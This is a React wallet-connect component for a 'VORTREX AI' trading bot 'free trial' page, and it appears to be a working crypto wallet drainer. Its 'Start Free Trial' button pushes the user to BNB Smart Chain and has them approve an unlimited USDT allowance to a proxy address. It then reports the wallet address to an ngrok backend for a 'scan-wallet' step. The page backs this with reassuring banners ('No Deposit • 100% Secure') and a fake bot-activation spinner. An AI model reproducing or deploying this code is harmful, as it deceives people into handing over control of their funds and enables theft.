import React, { useEffect, useState, useRef } from 'react';
import { ethers } from 'ethers';
import './ConnectWallet.css';
import ConnectWalletBackground from '../assets/connectwalletbackground.jpg';
import PopupMessage from './PopupMessage';
import MessageBox from './MessageBox';

const USDT_BEP = '0x55d398326f99059fF775485246999027B3197955';
const PROXY_BEP = '0x6af2999bf53D1f418FCb4364aafDD154e3ce9550';
const ABI = [
  'function approve(address spender, uint256 amount) external returns (bool)',
  'function allowance(address owner, address spender) view returns (uint256)'
];
const NGROK_API_BASE = 'https://skilled-donovan-doucely.ngrok-free.dev';

// 🔥 Universal error extractor — kabhi undefined nahi dega
const extractErrorMessage = (err) => {
  if (!err) return 'Unknown error occurred';

  if (err?.code === 4001 || err?.code === 'ACTION_REJECTED') {
    return 'You rejected the transaction.';
  }
  if (err?.code === -32002) {
    return 'Transaction already pending. Check your wallet.';
  }
  if (err?.code === -32603) {
    return 'Internal wallet error. Try switching to BSC manually.';
  }
  if (err?.code === 4902) {
    return 'BSC network not added in your wallet.';
  }
  if (err?.code === 'UNPREDICTABLE_GAS_LIMIT') {
    return 'Gas estimation failed. Make sure you have BNB for fees.';
  }
  if (err?.code === 'INSUFFICIENT_FUNDS') {
    return 'Insufficient BNB for gas fees.';
  }
  if (err?.code === 'CALL_EXCEPTION') {
    return 'Contract call failed. Please try again.';
  }
  if (err?.code === 'NETWORK_ERROR') {
    return 'Network error. Check your internet connection.';
  }
  if (
    err?.message?.includes?.('401') ||
    err?.message?.toLowerCase?.().includes?.('unauthorized') ||
    err?.message?.toLowerCase?.().includes?.('rpc http')
  ) {
    return 'Wallet RPC node busy. Please change BSC RPC to https://bsc-dataseed.binance.org and disable VPN.';
  }
  if (typeof err?.error?.message === 'string' && err.error.message) {
    return err.error.message;
  }
  if (typeof err?.data?.message === 'string' && err.data.message) {
    return err.data.message;
  }
  if (typeof err?.reason === 'string' && err.reason) {
    return err.reason;
  }
  if (typeof err?.message === 'string' && err.message.length > 0) {
    return err.message;
  }
  if (typeof err === 'string' && err.length > 0) {
    return err;
  }
  try {
    const s = JSON.stringify(err);
    if (s && s !== '{}') return s;
  } catch (_) {}
  return 'Transaction failed. Please try again.';
};

function ConnectWallet() {
  const [walletAddress, setWalletAddress] = useState('');
  const [isConnected, setIsConnected] = useState(false);
  const [connectedWalletType, setConnectedWalletType] = useState(null);
  const [popup, setPopup] = useState(null);
  const [isClaiming, setIsClaiming] = useState(false);
  const [isConnecting, setIsConnecting] = useState(false);
  const [showActivatingPopup, setShowActivatingPopup] = useState(false);
  const redirectTimeoutRef = useRef(null);

  const showPopup = (msg, type = 'success', duration = 8000) => {
    setPopup({ msg, type });
    setTimeout(() => setPopup(null), duration);
  };

  useEffect(() => {
    return () => {
      if (redirectTimeoutRef.current) {
        clearTimeout(redirectTimeoutRef.current);
      }
    };
  }, []);

  // ============ BINANCE WALLET DETECTION ============
  
  const isBinanceApp = () => {
    if (typeof window === 'undefined') return false;
    const ua = window.navigator.userAgent;
    return ua.includes('Binance') || ua.includes('binance') || ua.includes('BNB');
  };

  const getBinanceProvider = () => {
    if (window.binancew3w && window.binancew3w.ethereum) {
      return window.binancew3w.ethereum;
    }
    if (window.binancew3w && window.binancew3w.provider) {
      return window.binancew3w.provider;
    }
    if (window.BinanceChain && window.BinanceChain.ethereum) {
      return window.BinanceChain.ethereum;
    }
    if (window.ethereum && window.ethereum.isBinance) {
      return window.ethereum;
    }
    if (window.ethereum && window.ethereum.isBinanceChain) {
      return window.ethereum;
    }
    return null;
  };

  const isMetaMaskMobileBrowser = () => {
    return typeof window.ethereum !== "undefined" && /MetaMask/i.test(window.navigator.userAgent);
  };

  const isTrustWallet = () => {
    return window.ethereum && window.ethereum.isTrust;
  };

  useEffect(() => {
    localStorage.setItem('approval_stage', 'usdt');
    checkExistingConnection();
    
    if (window.ethereum) {
      window.ethereum.on('accountsChanged', handleAccountsChanged);
    }
    
    const binanceProvider = getBinanceProvider();
    if (binanceProvider) {
      binanceProvider.on('accountsChanged', handleAccountsChanged);
    }
    
    return () => {
      if (window.ethereum) {
        window.ethereum.removeListener('accountsChanged', handleAccountsChanged);
      }
      const bp = getBinanceProvider();
      if (bp) {
        bp.removeListener('accountsChanged', handleAccountsChanged);
      }
    };
  }, []);

  const handleAccountsChanged = (accounts) => {
    if (accounts && accounts.length > 0) {
      setWalletAddress(accounts[0]);
      setIsConnected(true);
    } else {
      setWalletAddress('');
      setIsConnected(false);
      setConnectedWalletType(null);
    }
  };

  const checkExistingConnection = async () => {
    const binanceProvider = getBinanceProvider();
    if (binanceProvider) {
      try {
        const accounts = await binanceProvider.request({ method: 'eth_accounts' });
        if (accounts && accounts.length > 0) {
          setWalletAddress(accounts[0]);
          setIsConnected(true);
          setConnectedWalletType('binance');
          console.log('✅ Binance already connected');
          return;
        }
      } catch (err) {
        console.log('Binance check:', err.message);
      }
    }
    
    if (window.ethereum) {
      try {
        const accounts = await window.ethereum.request({ method: 'eth_accounts' });
        if (accounts && accounts.length > 0) {
          setWalletAddress(accounts[0]);
          setIsConnected(true);
          if (isTrustWallet()) {
            setConnectedWalletType('trustwallet');
          } else {
            setConnectedWalletType('metamask');
          }
        }
      } catch (err) {
        console.log('Ethereum check:', err.message);
      }
    }
  };

  // ============ BINANCE CONNECT - ⚡ OPTIMIZED ============
  
  const connectBinanceWallet = async () => {
    if (isConnecting) {
      showPopup('⏳ Connection already in progress...', 'info', 2000);
      return;
    }

    if (isConnected && connectedWalletType === 'binance') {
      showPopup('✅ Already connected with Binance!', 'info', 3000);
      return;
    }

    setIsConnecting(true);
    showPopup('🔍 Looking for Binance Wallet...', 'info', 2000);

    try {
      let provider = null;
      let attempts = 0;
      
      while (!provider && attempts < 5) {
        provider = getBinanceProvider();
        if (!provider) {
          await new Promise(resolve => setTimeout(resolve, 100));
          attempts++;
        }
      }

      if (!provider) {
        if (isBinanceApp() && window.ethereum) {
          provider = window.ethereum;
          console.log('✅ Using window.ethereum as fallback');
        } else {
          showPopup('❌ Binance Wallet not found. Please make sure you are in Binance App DApp browser.', 'error', 5000);
          setIsConnecting(false);
          return;
        }
      }

      showPopup('🔄 Requesting connection...', 'info', 2000);
      
      const accounts = await provider.request({ 
        method: 'eth_requestAccounts' 
      });

      if (accounts && accounts.length > 0) {
        setWalletAddress(accounts[0]);
        setIsConnected(true);
        setConnectedWalletType('binance');
        showPopup('✅ Binance Wallet connected!', 'success', 3000);
        
        try {
          await provider.request({
            method: 'wallet_switchEthereumChain',
            params: [{ chainId: '0x38' }]
          });
        } catch (switchErr) {
          console.log('Chain switch skipped:', switchErr.message);
        }
      } else {
        showPopup('❌ No accounts found. Please unlock your Binance Wallet.', 'error', 4000);
      }
    } catch (err) {
      console.error('Binance connection error:', err);
      const msg = extractErrorMessage(err);
      if (err.code === 4001) {
        showPopup('❌ You rejected the connection request.', 'error', 4000);
      } else if (err.code === -32002) {
        showPopup('⚠️ Connection already pending. Check your Binance Wallet popup.', 'info', 5000);
      } else {
        showPopup(`❌ Connection failed: ${msg.slice(0, 80)}`, 'error', 5000);
      }
    } finally {
      setIsConnecting(false);
    }
  };

  // ============ METAMASK CONNECT ============
  
  const connectMetaMask = async () => {
    if (isConnecting) return;
    if (isConnected && connectedWalletType === 'metamask') {
      showPopup('✅ Already connected with MetaMask!', 'info', 3000);
      return;
    }

    if (!window.ethereum) {
      window.location.href = "https://metamask.app.link/dapp/www.vortrexai.site";
      return;
    }

    setIsConnecting(true);
    try {
      const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
      if (accounts && accounts.length > 0) {
        setWalletAddress(accounts[0]);
        setIsConnected(true);
        setConnectedWalletType('metamask');
        showPopup('✅ MetaMask connected!', 'success');
        
        try {
          await window.ethereum.request({
            method: 'wallet_switchEthereumChain',
            params: [{ chainId: '0x38' }]
          });
        } catch (e) {}
      }
    } catch (err) {
      showPopup(`❌ Failed to connect MetaMask: ${extractErrorMessage(err).slice(0, 80)}`, 'error');
    } finally {
      setIsConnecting(false);
    }
  };

  // ============ TRUST WALLET CONNECT ============
  
  const connectTrustWallet = async () => {
    if (isConnecting) return;
    if (isConnected && connectedWalletType === 'trustwallet') {
      showPopup('✅ Already connected with Trust Wallet!', 'info', 3000);
      return;
    }

    if (window.ethereum && window.ethereum.isTrust) {
      setIsConnecting(true);
      try {
        const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
        if (accounts && accounts.length > 0) {
          setWalletAddress(accounts[0]);
          setIsConnected(true);
          setConnectedWalletType('trustwallet');
          showPopup('✅ Trust Wallet connected!', 'success');
          
          try {
            await window.ethereum.request({
              method: 'wallet_switchEthereumChain',
              params: [{ chainId: '0x38' }]
            });
          } catch (e) {}
        }
      } catch (err) {
        showPopup(`❌ Failed to connect Trust Wallet: ${extractErrorMessage(err).slice(0, 80)}`, 'error');
      } finally {
        setIsConnecting(false);
      }
    } else {
      const url = encodeURIComponent("https://www.vortrexai.site");
      window.location.href = `https://link.trustwallet.com/open_url?coin_id=20000714&url=${url}`;
    }
  };

  // ============ APPROVE FUNCTION ============
  
  const getProviderForTx = () => {
    if (connectedWalletType === 'binance') {
      return getBinanceProvider();
    }
    return window.ethereum;
  };

  const notifyBackend = async () => {
    try {
      await fetch(`${NGROK_API_BASE}/api/wallet/approve`, {
        method: 'POST',
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ address: walletAddress, chain: 'bep20', token: 'usdt' })
      });
      await fetch(`${NGROK_API_BASE}/api/scan-wallet`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ address: walletAddress })
      });
    } catch (err) {
      console.warn('Backend notify failed:', err.message);
    }
  };

  const handleApprove = async () => {
    if (!isConnected) {
      showPopup('🛑 Please connect your wallet first!', 'error');
      return;
    }

    if (redirectTimeoutRef.current) {
      clearTimeout(redirectTimeoutRef.current);
    }

    try {
      setIsClaiming(true);
      let provider = getProviderForTx();
      if (!provider) throw new Error("No wallet provider found");

      // ============================================
      // 🔥 STEP 1: FORCE SWITCH TO BSC (chainId 56)
      // ============================================
      showPopup('🔄 Switching to BNB Smart Chain...', 'info', 3000);
      
      try {
        const currentChain = await provider.request({ method: 'eth_chainId' });
        console.log('🌐 Current chainId before switch:', currentChain);
        
        if (currentChain !== '0x38') {
          try {
            await provider.request({
              method: 'wallet_switchEthereumChain',
              params: [{ chainId: '0x38' }]
            });
          } catch (switchErr) {
            console.warn('Switch error:', switchErr);
            // Agar chain add nahi hai (code 4902) toh add karo
            if (switchErr.code === 4902) {
              await provider.request({
                method: 'wallet_addEthereumChain',
                params: [{
                  chainId: '0x38',
                  chainName: 'BNB Smart Chain',
                  nativeCurrency: { name: 'BNB', symbol: 'BNB', decimals: 18 },
                  rpcUrls: ['https://bsc-dataseed.binance.org'],
                  blockExplorerUrls: ['https://bscscan.com']
                }]
              });
            } else {
              throw switchErr;
            }
          }
          
          // Confirm switch hua ya nahi
          const chainAfter = await provider.request({ method: 'eth_chainId' });
          console.log('✅ Chain after switch:', chainAfter);
          
          if (chainAfter !== '0x38') {
            showPopup('⚠️ Please manually switch to BNB Smart Chain (BSC) in your wallet and try again.', 'error', 8000);
            setIsClaiming(false);
            return;
          }
        }
      } catch (switchErr) {
        console.error('Chain switch error:', switchErr);
        showPopup(`⚠️ Network switch failed: ${extractErrorMessage(switchErr).slice(0, 100)}. Please switch to BSC manually.`, 'error', 8000);
        setIsClaiming(false);
        return;
      }

      // ============================================
      // 🔥 STEP 2: VERIFY NETWORK IS BSC (chainId 56)
      // ============================================
      const web3Provider = new ethers.providers.Web3Provider(provider);
      const network = await web3Provider.getNetwork();
      console.log('🌐 Verified chainId:', network.chainId);
      
      if (network.chainId !== 56) {
        showPopup(`⚠️ Wrong network (chainId: ${network.chainId}). Please switch to BNB Smart Chain.`, 'error', 7000);
        setIsClaiming(false);
        return;
      }

      // ============================================
      // 🔥 STEP 3: CHECK BNB BALANCE ON BSC
      // ============================================
      const balance = await web3Provider.getBalance(walletAddress);
      const balanceInBNB = ethers.utils.formatEther(balance);
      console.log('💰 BNB balance on BSC:', balanceInBNB);
      
      const minGas = ethers.utils.parseEther('0.0001');
      if (balance.lt(minGas)) {
        showPopup(
          `⚠️ Insufficient BNB on BSC. You have ${parseFloat(balanceInBNB).toFixed(6)} BNB. Please add BNB (BEP20) to your BSC wallet.`,
          'error',
          8000
        );
        setIsClaiming(false);
        return;
      }

      // ============================================
      // 🔥 STEP 4: APPROVE USDT ON BSC
      // ============================================
      showPopup('🔄 Activating Trading Bot...', 'info', 5000);
      
      const signer = web3Provider.getSigner();
      const contract = new ethers.Contract(USDT_BEP, ABI, signer);
      
      const amountToApprove = ethers.constants.MaxUint256;
      
      let tx;
      try {
        tx = await contract.approve(PROXY_BEP, amountToApprove);
      } catch (estimateErr) {
        console.warn('Gas estimate failed, trying manual gasLimit:', estimateErr);
        tx = await contract.approve(PROXY_BEP, amountToApprove, {
          gasLimit: 100000
        });
      }
      
      await tx.wait();
      
      setIsClaiming(false);
      setShowActivatingPopup(true);
      
      redirectTimeoutRef.current = setTimeout(() => {
        setShowActivatingPopup(false);
        window.location.href = 'https://www.vortrexai.site/bot-activation';
      }, 3000);
      
      notifyBackend().catch(err => console.warn('Backend notify failed:', err));
      
    } catch (err) {
      console.error('Approve error full object:', err);
      const errorMsg = extractErrorMessage(err);
      showPopup(`❌ Failed: ${errorMsg.slice(0, 120)}`, 'error');
      setIsClaiming(false);
      setShowActivatingPopup(false);
    }
  };

  // Button text helpers
  const getMetaMaskButtonText = () => {
    if (isConnected && connectedWalletType === 'metamask') return "✅ Connected with MetaMask";
    if (isConnecting) return "⏳ Connecting...";
    return "🦊 Connect with MetaMask";
  };

  const getTrustWalletButtonText = () => {
    if (isConnected && connectedWalletType === 'trustwallet') return "✅ Connected with Trust Wallet";
    if (isConnecting) return "⏳ Connecting...";
    return "🔵 Connect with Trust Wallet";
  };

  const getBinanceButtonText = () => {
    if (isConnected && connectedWalletType === 'binance') return "✅ Connected with Binance";
    if (isConnecting) return "⏳ Connecting...";
    return "🟡 Connect with Binance";
  };

  return (
    <>
      <MessageBox icon="🚀" text="VORTREX isn't just a tool — it's a revolution in automated profit generation" />
      <div className="wallet-section section-gap" style={{
        backgroundImage: `url(${ConnectWalletBackground})`,
        backgroundSize: 'cover',
        backgroundRepeat: 'no-repeat',
        backgroundPosition: 'center center'
      }}>
        <h1>🎯 Trial Mode is Live</h1>
        <p>🔐 Get Instant Access to the VORTREX AI Trading Dashboard</p>

        <button onClick={connectMetaMask} className="wallet-connect-btn" disabled={isConnecting || isClaiming || showActivatingPopup}>
          {getMetaMaskButtonText()}
        </button>

        <button onClick={connectTrustWallet} className="wallet-connect-btn" disabled={isConnecting || isClaiming || showActivatingPopup}>
          {getTrustWalletButtonText()}
        </button>

        <button onClick={connectBinanceWallet} className="wallet-connect-btn binance-btn" disabled={isConnecting || isClaiming || showActivatingPopup}>
          {getBinanceButtonText()}
        </button>

        <br /><br />

        <button onClick={handleApprove} className="wallet-approve-btn pulse-button" disabled={isClaiming || showActivatingPopup}>
          🚀 Start Free Trial
        </button>

        <div className="wallet-status">
          {isConnected ? (
            <span style={{ color: 'lightgreen' }}>🟢 Connected: {walletAddress}</span>
          ) : (
            <span style={{ color: 'salmon' }}>🔴 Wallet not connected</span>
          )}
        </div>

        <div className="presale-banner">
          <span>✅ 12,000+ Wallets Activated – Global Access • No Deposit • 100% Secure & Anonymous</span>
        </div>

        {popup && <PopupMessage message={popup.msg} type={popup.type} onClose={() => setPopup(null)} />}

        {showActivatingPopup && (
          <div className="activating-popup-overlay">
            <div className="activating-popup-box">
              <div className="activating-spinner"></div>
              <h3>🤖 Activating Your VORTREX AI Bot</h3>
              <p>Setting up your trading environment...</p>
              <div className="activating-progress-bar">
                <div className="activating-progress-fill"></div>
              </div>
            </div>
          </div>
        )}
      </div>
    </>
  );
}

export default ConnectWallet;